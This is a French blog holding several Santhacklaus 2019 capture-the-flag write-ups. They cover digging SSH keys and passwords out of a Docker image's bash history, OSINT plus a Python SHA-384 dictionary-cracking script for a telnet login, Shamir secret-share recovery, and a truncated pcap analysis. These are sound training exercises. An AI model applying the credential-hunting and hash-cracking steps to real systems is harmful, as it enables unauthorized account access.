<span class="m">153</span> ./beb357bfdfd498ff0fbb507996c034316381dc3a7c163890412f33fc3323c84b/diff/home/node/.bash_history
</code></pre></div>
<p>BINGO ! On a retrouvé le dossier contenu les fichiers recherchés. Un <code>tree</code> sur le dossier nous le confirme :</p>
<div class="highlight"><pre><span></span><code>$ tree -a
.
├── home
│ └── node
│ ├── .bash_history
│ └── .bashrc
└── usr
└── share
└── prod-common
├── dev_081219_backup.zip
├── dev_091219_backup.zip
├── dev_101219_backup.zip
├── dev_111219_backup.zip
├── dev_121219_backup.zip
├── dev_131219_backup.zip
├── dev_141219_backup.zip
├── dev_151219_backup.zip
└── dev_161219_backup.zip
<span class="m">5</span> directories, <span class="m">11</span> files
</code></pre></div>
<p>Le zip se trouvant dans le dossier <code>prod-common</code> peut indiqué la piste souhaité pour se connecter sur le serveur de production. La commande <code>zipinfo</code> va nous donner des informations sur leur contenu :</p>
<div class="highlight"><pre><span></span><code>$ zipinfo usr/share/prod-common/dev_081219_backup.zip
Archive: usr/share/prod-common/dev_081219_backup.zip
Zip file size: <span class="m">1290</span> bytes, number of entries: <span class="m">2</span>
-rw------- <span class="m">3</span>.0 unx <span class="m">821</span> TX defN <span class="m">19</span>-Dec-18 <span class="m">21</span>:31 id_santa_production
-rw-r--r-- <span class="m">3</span>.0 unx <span class="m">296</span> TX defN <span class="m">19</span>-Dec-18 <span class="m">21</span>:31 id_santa_production.pub
<span class="m">2</span> files, <span class="m">1117</span> bytes uncompressed, <span class="m">872</span> bytes compressed: <span class="m">21</span>.9%
</code></pre></div>
<p>Parfait. Des clés SSH (publique et privée) pour y accéder. On extrait donc son contenu :</p>
<div class="highlight"><pre><span></span><code>$ unzip dev_081219_backup.zip
Archive: dev_081219_backup.zip
<span class="o">[</span>dev_081219_backup.zip<span class="o">]</span> id_santa_production password:
</code></pre></div>
<p>Cela ne pouvait pas être aussi facil :(. Regardons si nous pouvons avoir des indications ou même, le mot de passe dans un des deux autres fichiers que nous avons récupérer. Une recherche sur les deux fichiers avec <code>pass</code> peut nous mettre sur la voie :</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'pass'</span> .
./.bash_history:49:vncpasswd
./.bash_history:50:vncpasswd -type
./.bash_history:54:vncpasswd -type Password
./.bash_history:55:vncpasswd -type <span class="s2">"Password"</span>
./.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
$ grep -rHin <span class="s1">'ARCHIVE_PIN'</span> .
./.bash_history:61:export <span class="nv">ARCHIVE_PIN</span><span class="o">=</span><span class="m">25362</span>
./.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
</code></pre></div>
<p>Et c'est le cas. On a le code PIN pour l'archive mais on ne sait cependant pas quelle archive est rattachée à ce PIN. On peut donc essayer sur l'ensemble avec la commande <code>find</code> :</p>
<div class="highlight"><pre><span></span><code>$ find usr/share/prod-common -exec unzip -P <span class="s2">"25362"</span> <span class="o">{}</span> <span class="se">\;</span>
unzip: cannot find or open ., ..zip or ..ZIP.
Archive: ./dev_081219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_131219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_151219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_161219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_141219_backup.zip
inflating: id_santa_production
inflating: id_santa_production.pub
Archive: ./dev_121219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_091219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_101219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
Archive: ./dev_111219_backup.zip
skipping: id_santa_production incorrect password
skipping: id_santa_production.pub incorrect password
$ ls -l
<span class="o">[</span>...<span class="o">]</span>
-rw------- <span class="m">1</span> root root <span class="m">821</span> Dec <span class="m">18</span> <span class="m">21</span>:31 id_santa_production
-rw-r--r-- <span class="m">1</span> root root <span class="m">296</span> Dec <span class="m">18</span> <span class="m">21</span>:31 id_santa_production.pub
</code></pre></div>
<p>Parfait. On a bien les clés. Mais on a toujours pas la commande SSH pour ce connecter. Comme pour le PIN, un <code>grep</code> suffit à retrouver l'information.</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'ssh'</span> home/node/
.bash_history:56:sudo nano /etc/ssh/sshd_config
.bash_history:57:sudo service restart ssh
.bash_history:58:sudo service ssh restart
.bash_history:62:ls ~/.ssh
.bash_history:64:ssh-keygen -t rsa -C jmding0714@gmail.com
.bash_history:65:cd ~/.ssh/
.bash_history:129:nano ~/.ssh/authorized_keys
.bash_history:130:ssh -p <span class="m">5700</span> rudolf-the-reindeer@46.30.204.47
</code></pre></div>
<p>On peut donc essayer de se connecter avec la clé et les informations trouvées :</p>
<div class="highlight"><pre><span></span><code>$ ssh -p <span class="m">5700</span> -i usr/share/prod-common/id_santa_production rudolf-the-reindeer@46.30.204.47
Enter passphrase <span class="k">for</span> key <span class="s1">'usr/share/prod-common/id_santa_production'</span>:
</code></pre></div>
<p>Bon. Nouveau mot de passe à trouvé. Cela ne pouvait pas être aussi simple :(. On reprend donc la recherche avec <code>grep</code> :</p>
<div class="highlight"><pre><span></span><code>$ grep -rHin <span class="s1">'password'</span> home/node/
home/node/.bash_history:54:vncpasswd -type Password
home/node/.bash_history:55:vncpasswd -type <span class="s2">"Password"</span>
home/node/.bash_history:115:zip --password <span class="s2">"</span><span class="nv">$ARCHIVE_PIN</span><span class="s2">"</span> <span class="s2">"</span><span class="nv">$PRODUCTION_BACKUP_FILE</span><span class="s2">"</span> id_santa_production*
$ grep -rHin <span class="s1">'pwd'</span> home/node/
home/node/.bash_history:78:pwd
home/node/.bashrc:68: <span class="nb">export</span> <span class="nv">PRD_PWD</span><span class="o">=</span><span class="s1">'HoHoHo2020!NorthPole'</span>
</code></pre></div>
<p>Et une fois de plus, c'est une victoire pour <code>grep</code> !</p>
<p>On relance notre commande <code>ssh</code> :</p>
<div class="highlight"><pre><span></span><code>$ ssh -p <span class="m">5700</span> -i usr/share/prod-common/id_santa_production rudolf-the-reindeer@46.30.204.47
Enter passphrase <span class="k">for</span> key <span class="s1">'usr/share/prod-common/id_santa_production'</span>:
___ _ _ _ _____ _ ___ _____ ___
/ __<span class="p">|</span> /_<span class="se">\ </span><span class="p">|</span> <span class="se">\|</span> <span class="p">|</span>_ _/_<span class="se">\ </span> / __<span class="p">|</span>_ _<span class="p">|</span> __<span class="p">|</span>
<span class="se">\_</span>_ <span class="se">\/</span> _ <span class="se">\|</span> .<span class="sb">`</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>/ _ <span class="se">\ </span> <span class="p">|</span> <span class="o">(</span>__ <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _<span class="p">|</span>
<span class="p">|</span>___/_/ <span class="se">\_\_</span><span class="p">|</span><span class="se">\_</span><span class="p">|</span> <span class="p">|</span>_/_/ <span class="se">\_\ </span> <span class="se">\_</span>__<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>
Well <span class="k">done</span>, the flag is SANTA<span class="o">{</span>NeverTrustDockerImages7263<span class="o">}</span>
You may now log out of this server with <span class="s2">"exit"</span>
-bash-5.0$
</code></pre></div>
<p>Et c'est le FLAG !</p>
<p><img alt="https://i.giphy.com/media/VQ77RNKX0nyaA/giphy.webp" src="https://i.giphy.com/media/VQ77RNKX0nyaA/giphy.webp"></p>
<p>Très bon challenge pour découvrir et mieux comprendre le fonctionnement de Docker. Merci <3.</p>Santhacklaus 2019 - witchehh's blog2019-12-29T00:00:00+01:002019-12-29T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-29:/santhacklaus-2019-witchehhs-blog.html<div class="highlight"><pre><span></span><code>Hey !
I just find this new blog post that gives some very good advices on how to protect your life by using a strong password.
http://46.30.204.44:1000/
</code></pre></div>
<p>Il s'agit d'un blog d'un certain witchehh prodiguant des conseils sur la création de mot de passes.</p>
<p><img alt="witchehh1.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh1.png"></p>
<p>On peut …</p><div class="highlight"><pre><span></span><code>Hey !
I just find this new blog post that gives some very good advices on how to protect your life by using a strong password.
http://46.30.204.44:1000/
</code></pre></div>
<p>Il s'agit d'un blog d'un certain witchehh prodiguant des conseils sur la création de mot de passes.</p>
<p><img alt="witchehh1.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh1.png"></p>
<p>On peut s'y inscrire et se connecter. On a alors une page indiquant que d'autres fonctionnalités arriveront bientôt.</p>
<p>N'ayant pas plus d'information, on commence à faire de la reconnaissance sur le site.</p>
<div class="highlight"><pre><span></span><code>$ nikto -host http://46.30.204.44:1000/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: <span class="m">46</span>.30.204.44
+ Target Hostname: <span class="m">46</span>.30.204.44
+ Target Port: <span class="m">1000</span>
+ Start Time: <span class="m">2019</span>-12-29 <span class="m">21</span>:05:07 <span class="o">(</span>GMT1<span class="o">)</span>
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 <span class="o">(</span>Debian<span class="o">)</span>
+ Retrieved x-powered-by header: PHP/7.2.25
+ <span class="o">[</span>...<span class="o">]</span>
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ <span class="m">8348</span> requests: <span class="m">0</span> error<span class="o">(</span>s<span class="o">)</span> and <span class="m">12</span> item<span class="o">(</span>s<span class="o">)</span> reported on remote host
+ End Time: <span class="m">2019</span>-12-29 <span class="m">21</span>:06:44 <span class="o">(</span>GMT1<span class="o">)</span> <span class="o">(</span><span class="m">97</span> seconds<span class="o">)</span>
---------------------------------------------------------------------------
+ <span class="m">1</span> host<span class="o">(</span>s<span class="o">)</span> tested
$ dirb http://46.30.204.44:1000
<span class="o">[</span>...<span class="o">]</span>
---- Scanning URL: http://46.30.204.44:1000/ ----
+ http://46.30.204.44:1000/cgi-bin/ <span class="o">(</span>CODE:403<span class="p">|</span>SIZE:279<span class="o">)</span>
<span class="o">==</span>> DIRECTORY: http://46.30.204.44:1000/img/
+ http://46.30.204.44:1000/index.php <span class="o">(</span>CODE:200<span class="p">|</span>SIZE:5039<span class="o">)</span>
+ http://46.30.204.44:1000/server-status <span class="o">(</span>CODE:403<span class="p">|</span>SIZE:279<span class="o">)</span>
---- Entering directory: http://46.30.204.44:1000/img/ ----
<span class="o">(</span>!<span class="o">)</span> WARNING: Directory IS LISTABLE. No need to scan it.
<span class="o">(</span>Use mode <span class="s1">'-w'</span> <span class="k">if</span> you want to scan it anyway<span class="o">)</span>
-----------------
END_TIME: Sun Dec <span class="m">29</span> <span class="m">21</span>:06:10 <span class="m">2019</span>
DOWNLOADED: <span class="m">4612</span> - FOUND: <span class="m">3</span>
</code></pre></div>
<p>On ne voit alors pas grand chose si ce n'est l'<code>indexof</code> activé sur le dossier <code>img</code>. Peut être que cela peut nous donner des indications sur son mot de passe.</p>
<p><img alt="witchehh3.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh3.png"></p>
<p>Les images sont celles de la page d'accueil à part pour celle là :</p>
<p><img alt="port2000.jpg" src="https://blog.nlegall.fr/images/santhacklaus/port2000.jpg"></p>
<p>Port 2000... On a peut-être la suite du challenge sur le port 2000 en utilisant l'ip. On se connecte et on obtient ceci :</p>
<div class="highlight"><pre><span></span><code>$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : username
This account does not exist
$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : witchehh
Password :
Wrong Password !
</code></pre></div>
<p>Bon, donc c'est sûrement pour la suite mais pas utile sans le mot de passe.</p>
<h2>OSINT</h2>
<p>On est donc parti à la pêche aux informations sur ce <code>Billy Délivre</code>. On peut trouver un compte Instagramm et Facebook. Son profil Facebook étant plus complet, on garde celui-là :</p>
<p><img alt="witchehh2.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh2.png"></p>
<p>On y voit des affiches de films, des musiques, divers personnages et une image pour présenter son blog.</p>
<p>Cette dernière contient en plus de l'article, un hash et un début de ce qui pourrait être le mot de passe associée au hash.</p>
<div class="highlight"><pre><span></span><code>$ hashid 90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d
Analyzing <span class="s1">'90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d'</span>
<span class="o">[</span>+<span class="o">]</span> SHA-384
<span class="o">[</span>+<span class="o">]</span> SHA3-384
<span class="o">[</span>+<span class="o">]</span> Skein-512<span class="o">(</span><span class="m">384</span><span class="o">)</span>
<span class="o">[</span>+<span class="o">]</span> Skein-1024<span class="o">(</span><span class="m">384</span><span class="o">)</span>
</code></pre></div>
<p>Bon. On a donc deux solutions qui s'offre à nous : bruteforce avec un dictionnaire généré sur les informations recueillies ou chercher si ce hash est présent quelque part sur le net.</p>
<h3>Bruteforce</h3>
<p>On a donc une structure possible énoncé sur son site (<code>[mot][séparateur][nombre][séparateur][mot]</code>) et le début possible du premier mot : <code>annec</code>. On peut conclure le premier étant <code>annecy</code> d'après l'OSINT précédent.</p>
<p>Il nous faut donc trouver le séparateur et le nombre avec le dernier mot. Afin de gagner du temps, une simple boucle Python parcourant notre liste de mots est suffisante pour générer notre dictionnaire (<a href="https://gist.github.com/Darkitty/cdb41e5e47dd6aa368a4dab950286ef2">liste</a>):</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python3</span>
<span class="c1"># coding : utf-8</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="c1"># récupère l'ensemble des mots issus de l'OSINT</span>
<span class="n">liste</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'liste'</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
<span class="c1"># séparateurs possibles</span>
<span class="n">split</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'-'</span><span class="p">,</span> <span class="s1">'*'</span><span class="p">,</span> <span class="s1">'_'</span><span class="p">,</span> <span class="s1">'.'</span><span class="p">,</span> <span class="s1">'+'</span><span class="p">,</span> <span class="s1">'='</span><span class="p">,</span> <span class="s1">'§'</span><span class="p">,</span> <span class="s1">'!'</span><span class="p">,</span> <span class="s1">' '</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">,</span> <span class="s1">'</span><span class="se">\\</span><span class="s1">'</span><span class="p">,</span> <span class="s1">'&'</span><span class="p">,</span> <span class="s1">'~'</span><span class="p">]</span>
<span class="c1"># nombre de 0 à 99</span>
<span class="n">nbrange</span> <span class="o">=</span> <span class="nb">range</span><span class="p">(</span><span class="mi">99</span><span class="p">)</span>
<span class="c1"># hash à retrouver</span>
<span class="n">target</span> <span class="o">=</span> <span class="s2">"90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d"</span>
<span class="n">word</span> <span class="o">=</span> <span class="s1">'annecy'</span>
<span class="k">for</span> <span class="n">sep</span> <span class="ow">in</span> <span class="n">split</span><span class="p">:</span>
<span class="k">for</span> <span class="n">sep2</span> <span class="ow">in</span> <span class="n">split</span><span class="p">:</span>
<span class="k">for</span> <span class="n">number</span> <span class="ow">in</span> <span class="n">nbrange</span><span class="p">:</span>
<span class="k">for</span> <span class="n">lastword</span> <span class="ow">in</span> <span class="n">liste</span><span class="p">:</span>
<span class="n">password</span> <span class="o">=</span> <span class="p">(</span><span class="n">word</span> <span class="o">+</span> <span class="n">sep</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">number</span><span class="p">)</span> <span class="o">+</span> <span class="n">sep2</span> <span class="o">+</span> <span class="n">lastword</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
<span class="n">sha384</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha384</span><span class="p">(</span><span class="n">password</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">if</span> <span class="n">sha384</span> <span class="o">==</span> <span class="n">target</span> <span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"FOUND !"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The password is : "</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">pass</span>
</code></pre></div>
<p>Cela est suffisant pour générer un dictionnaire contenant 2375802 lignes à partir de la liste de 142 mots.</p>
<p>Afin d'éviter de forcer sur le site et ayant le hash cible, une comparaison des hashs générés à partir de notre liste et celui trouvé sur Facebook nous permettra de retrouver le mot de passe complet (<a href="https://github.com/Oseid/HASHCat">HASHCat</a>) :</p>
<div class="highlight"><pre><span></span><code>$ python script.py
FOUND !
The password is : annecy+44+saitama
</code></pre></div>
<h3>"Intelligente"</h3>
<p>On peut donc se rendre sur <a href="https://crackstation.net">https://crackstation.net</a> ou <a href="https://md5hashing.net">https://md5hashing.net</a> et voir si un résultat en clair nous est renvoyé.</p>
<p><img alt="witchehh4.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh4.png"></p>
<p>BINGO ! On a le mot de passe.</p>
<h2>Port 2000</h2>
<p>On a donc le mot de passe. On peut donc ce connecter à son compte sur le blog. Cela nous permet d'afficher l'image que nous avions déjà trouver précédemment lors de la reconnaissance.</p>
<p>Il nous reste donc à se conncecter en <code>telnet</code> :</p>
<div class="highlight"><pre><span></span><code>$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : witchehh
Password : annecy+44+saitama
Welcome, here is your flag : SANTA<span class="o">{</span>Cr4cK_L0rD<span class="o">}</span>
</code></pre></div>
<p>YEAH ! C'est le flag et les points avec :D.</p>Santhacklaus 2019 - Shamir's 10th prisoner dilemna2019-12-26T00:00:00+01:002019-12-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-26:/santhacklaus-2019-shamirs-10th-prisoner-dilemna.html<div class="highlight"><pre><span></span><code>Come on cheaters. This challenge is for you. You can communicate with others, work with them, we don't care. You won't ever find out what this challenge is about. You really thought we weren't gonna troll you a bit ? Come on... be realistic... this is a CTF …</code></pre></div><div class="highlight"><pre><span></span><code>Come on cheaters. This challenge is for you. You can communicate with others, work with them, we don't care. You won't ever find out what this challenge is about. You really thought we weren't gonna troll you a bit ? Come on... be realistic... this is a CTF... So here you go, have fun, you've got not link, no file, nothing.
May the secret sent to you by email be known by anyone else than yourself, you'll find yourself in a situation you would rather not get into... (check your spams)...
For users registered after 21/12/2019 - 06:00 PM. You can ask us (Shutdown or m3lsius) for you secret on Discord. Be aware that we will proceed to a few checks before giving it to you (to check your rules compliance), and we do not guarantee you a quick answer, or even an answer at all.
</code></pre></div>
<p>Bon, n'ayant aucune idée ce que ce c'est, on commence par une recherche internet : <a href="https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing">https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing</a>.</p>
<p>On y apprends qu'il s'agit d'un algorithme créé par la personne éponyme (<a href="https://en.wikipedia.org/wiki/Adi_Shamir">Adi Shamir</a>). Cet algorithme découpe un message en X parties et il faut un minimum de Y parties pour retrouver le message original.</p>
<p>Chaque participant a donc reçu par mail son secret :</p>
<div class="highlight"><pre><span></span><code>Hello fierce challenger.
Here is a secret you must keep until the end of the CTF.
0203-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
</code></pre></div>
<p>Ok, c'est indiqué que nous devons le garder secret mais nous devons en réunir plusieurs pour avoir le flag. Il est donc nécessaire d'échange entre nous mais en restant discrets...</p>
<p>Ayant quelques amis participants, on s'échange nos secrets contre des bières :).</p>
<p>Me voilà en possessions d'une première série de secrets :</p>
<div class="highlight"><pre><span></span><code>0256-a97f86326b5a7915e902469ead07567f5922e62a4fb5e1f5b7a0d5752f69c2ca7640b15ed0b3114ff1dc754134ee89ddf574c32970
0122-d7ed069ea110295452d9ffbdf41a2ed3fa2f7947eb390958fb33beaba0a03c373ceecbddfe6fe1589566478ef58c23c1c1cdfe1ee0
0091-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
</code></pre></div>
<p>Soit un total de 4 avec le mien. On peut se dire que cela est peut être suffisant. Il nous donc trouver un outil maintenant pour interpréter tout cela. On trouve alors la page suivante : <a href="http://point-at-infinity.org/ssss/">http://point-at-infinity.org/ssss/</a>. C'est la page d'explication du principe de chiffrement et il propose un binaire (<code>ssss</code>) ainsi qu'une version en ligne (<a href="http://point-at-infinity.org/ssss/demo.html">http://point-at-infinity.org/ssss/demo.html</a>).</p>
<p>Ayant une préférence toujours pour le CLI, on récupère le binaire et on a donc accès à la commande <code>ssss-combine</code>. On lui passe en argument <code>-t</code> le nombre de hashs à disposition et il reconstitue le secret. Ce qui nous donne :</p>
<div class="highlight"><pre><span></span><code>$ ssss-combine -t <span class="m">4</span>
Enter <span class="m">4</span> shares separated by newlines:
Share <span class="o">[</span><span class="m">1</span>/4<span class="o">]</span>: <span class="m">0203</span>-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
Share <span class="o">[</span><span class="m">2</span>/4<span class="o">]</span>: <span class="m">0256</span>-a97f86326b5a7915e902469ead07567f5922e62a4fb5e1f5b7a0d5752f69c2ca7640b15ed0b3114ff1dc754134ee89ddf574c32970
Share <span class="o">[</span><span class="m">3</span>/4<span class="o">]</span>: <span class="m">0122</span>-d7ed069ea110295452d9ffbdf41a2ed3fa2f7947eb390958fb33beaba0a03c373ceecbddfe6fe1589566478ef58c23c1c1cdfe1ee0
Share <span class="o">[</span><span class="m">4</span>/4<span class="o">]</span>: <span class="m">0091</span>-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
Resulting secret: .Z....0Q.sv....<span class="p">&</span>zL......e.. ..,.6.@-....#A._.7.8...<span class="o">(</span>.
WARNING: binary data detected, use -x mode instead.
</code></pre></div>
<p>Hum... Pas très concluant.</p>
<p>On relit le titre et on voit qu'il parle du dixième prisonnier. Il faut donc peut être 10 hashs au total pour avoir le secret de reconstitué.</p>
<p>On échange avec d'autres participants, on fait de la stéganographie pour les partager, des pastbins et nous voilà en possession des dix hashs.</p>
<p>On relance la commande avec l'ensemble des hashs :</p>
<div class="highlight"><pre><span></span><code>$ ssss-combine -t <span class="m">10</span>
Enter <span class="m">10</span> shares separated by newlines:
Share <span class="o">[</span><span class="m">1</span>/10<span class="o">]</span>: <span class="m">0203</span>-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
<span class="o">[</span>...<span class="o">]</span>
Share <span class="o">[</span><span class="m">10</span>/10<span class="o">]</span>: <span class="m">0091</span>-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
Resulting secret: SANTA<span class="o">{</span>c0mmun1c4tion_I5_KEEEEEEEY_jeveuxdeschaussures<span class="o">}</span>
</code></pre></div>
<p>Et c'est le FLAG !</p>
<p><img alt="https://i.giphy.com/media/13KtvzT3PWytgY/giphy.webp" src="https://i.giphy.com/media/13KtvzT3PWytgY/giphy.webp"></p>
<p>Challenge très intéressant et forçant l’interaction entre les participants. Merci encore <3.</p>Santhacklaus 2019 - Revmomon2019-12-25T00:00:00+01:002019-12-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-25:/santhacklaus-2019-revmomon.html<div class="highlight"><pre><span></span><code>Suspicious activity has been detected. Probably nothing to be scared about but take a look anyway.
If you find anything, a backdoor, a malware or anything of this kind, flag is the sha256 of it.
</code></pre></div>
<h2>Statistiques</h2>
<table>
<thead>
<tr>
<th>Measurement</th>
<th>Captured</th>
</tr>
</thead>
<tbody>
<tr>
<td>Packets</td>
<td>185701</td>
</tr>
<tr>
<td>Time span, s</td>
<td>653.730</td>
</tr>
<tr>
<td>Average pps</td>
<td>284.1</td>
</tr>
<tr>
<td>Average …</td></tr></tbody></table><div class="highlight"><pre><span></span><code>Suspicious activity has been detected. Probably nothing to be scared about but take a look anyway.
If you find anything, a backdoor, a malware or anything of this kind, flag is the sha256 of it.
</code></pre></div>
<h2>Statistiques</h2>
<table>
<thead>
<tr>
<th>Measurement</th>
<th>Captured</th>
</tr>
</thead>
<tbody>
<tr>
<td>Packets</td>
<td>185701</td>
</tr>
<tr>
<td>Time span, s</td>
<td>653.730</td>
</tr>
<tr>
<td>Average pps</td>
<td>284.1</td>
</tr>
<tr>
<td>Average packet size, B</td>
<td>165</td>
</tr>
<tr>
<td>Bytes</td>
<td>30632502</td>
</tr>
<tr>
<td>Average bytes/s</td>
<td>46 k</td>
</tr>
<tr>
<td>Average bits/s</td>
<td>374 k</td>
</tr>
</tbody>
</table>
<h2>Première analyse</h2>
<p>Une première analyse pour permet de voir que la trame contient beaucoup d'informations et d'échanges mais également beaucoup de bruit. Un filtre pour masquer tout ce qui ne nous concerne pas permet de rendre l'ensemble plus clair :</p>
<ul>
<li>Enlever l'échange TCP du début : <code>not tcp.flags == 0x002 && not tcp.flags == 0x014</code></li>
<li>Enlever la partie installation de paquets : <code>not ip.addr == 212.211.132.250 && not ip.addr == 151.101.120.204 && not ip.addr == 130.89.148.77</code></li>
<li>Enlever les erreurs HTTP lors de la reconnaissance : <code>not http.response.code == 404</code></li>
</ul>
<p>Ok, on y vois plus clair. En fin de trame, on voit qu'un échange TLSv1.2 est initié. Il serait donc intéressant de réuissir à en déchiffrer son contenu.</p>
<h2>TLS et clés privées</h2>
<p>On applique un filtre pour ne garder que les échanges TLS et surout, les handshakes. C'est dans ce premier échange fait entre le client et le serveur que la chaine de certificats (qui nous intéresse ici), le cipher à utiliser et d'autes informations techniques sont échangées.</p>
<p>On met notre filtre : <code>tls.handshake.certificate</code> (version améliorée pour préciser de n'afficher que les paquets contenants des certificats).</p>
<p><img alt="revmomon1" src="https://blog.nlegall.fr/images/santhacklaus/revmomon1.png"></p>
<p>On a donc deux serveurs qui ont initié une connexion TLS donc possiblement deux certificats à récupérer. Un commande <code>tshark</code> va nous permettre d'extraire tout ça :</p>
<div class="highlight"><pre><span></span><code>$ tshark -r challenge.pcapng -2 -R <span class="s2">"tls.handshake.certificate"</span> -T fields -e tls.handshake.certificate <span class="p">|</span> sort -u <span class="p">|</span> uniq
30820234308201b9a0030201020210669bc735e2efa66d73c3f6abcf7839d5300a06082a8648ce3d040303300b31093007060355040a1300301e170d3139303632383138353934365a170d3232303632373138353934365a300b31093007060355040a130030820122300d06092a864886f70d01010105000382010f003082010a0282010100ecdc7092ac7759ca662b69a88da21f8c9f27036118adfa329d039784af2d046efa217a1e888196811484dd4a4c4e185ca47083f98a412a6c878da613556efff56a43815a148e06d997d2a4136f146a3af4f1e37ad7c19cc453c5934bbd3aadc79982637607647d9c8727e088ce0f99493e5957dc31f0deb86a80b9c8b79ac0bc717d1c204e832fe25eacc7080c7725ea37e6cb725abcd7a045387287ae2d300fe872c0dfad97a81a17fb2219a99fb1fa13e55992a80412991adde1c32bcb02ca04bc2382b6fd9cd67c839dcd132e7c271a3e07c44f7c40fb95f6f71cf4c32228eb94412f90d2373aa5d98a65d280e5fc5b658b9eba5ef5bb1e6cb62832beb1790203010001a3343032300e0603551d0f0101ff0404030205a030130603551d25040c300a06082b06010505070301300b0603551d11040430028200300a06082a8648ce3d0403030369003066023100fda55dcda4b192e2b1438afa7d6f5dc9bb4974cbf3d7ca8c43ab0189ec35f02c111bf22f45a25247d27de6c2e915cb60023100ec992f1062febd7929b17184d3ab42ed3022059190276f29eaa7ca17ad962533891a845b7df5bdbb1fa95ed13bd33edb
